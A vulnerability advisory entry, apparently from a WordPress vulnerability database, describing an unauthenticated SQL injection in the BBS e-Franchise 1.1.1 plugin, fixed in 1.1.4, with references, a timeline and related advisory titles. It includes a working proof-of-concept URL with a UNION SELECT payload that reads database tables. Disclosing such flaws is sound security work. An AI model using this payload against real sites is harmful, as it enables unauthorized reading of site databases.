BBS e-Franchise 1.1.1 – Unauthenticated SQL Injection

Description

$_GET[‘uid’] is not escaped, the URL is accessible for any user.

You will have find a post or page that uses the plugin's shortcode.

Proof of Concept

http://www.example.com/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1

Affects Plugins

bbs-e-franchise

Fixed in 1.1.4

References

Exploitdb

40782

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br

Submitter twitter

lenonleite

Verified

WPVDB ID

4cd021dd-2455-4864-a29b-01250254cd68

Timeline

Publicly Published

2016-11-12 (about 9 years ago)

Added

2016-12-06 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2024-10-31

Title

RSVP ME <= 1.9.9 - Authenticated (Contributor+) SQL Injection

Published

2023-12-28

Title

Events Shortcodes & Templates For The Events Calendar < 2.3.2 - Authenticated (Contributor+) SQL Injection via shortcode

Published

2024-09-26

Title

Zoho Flow for WordPress < 2.8.1 - Authenticated (Administrator+) SQL Injection

Published

2021-11-29

Title

Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection

Published

2024-03-29

Title

10Web Map Builder for Google Maps <= 1.0.74 - Authenticated (Administrator+) SQL Injection